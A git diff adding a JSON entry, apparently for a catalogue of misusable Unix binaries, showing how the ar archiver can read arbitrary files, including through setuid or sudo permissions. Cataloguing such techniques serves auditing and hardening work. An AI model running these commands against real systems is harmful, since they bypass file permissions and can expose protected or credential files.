diff --git a/data/ar.json b/data/ar.json new file mode 100644 index 0000000..36915e3 --- /dev/null +++ b/data/ar.json @@ -0,0 +1,20 @@ +{ + "description": "The file appears amid the binary content of the archive.", + "functions": { + "file-read": [ + { + "code": "ar r \"[output]\" \"[file]\"\ncat \"[output]\"\n" + } + ], + "suid": [ + { + "code": "./ar r \"[output]\" \"[file]\"\ncat \"[output]\"\n" + } + ], + "sudo": [ + { + "code": "sudo ar r \"[output]\" \"[file]\"\ncat \"[output]\"\n" + } + ] + } +}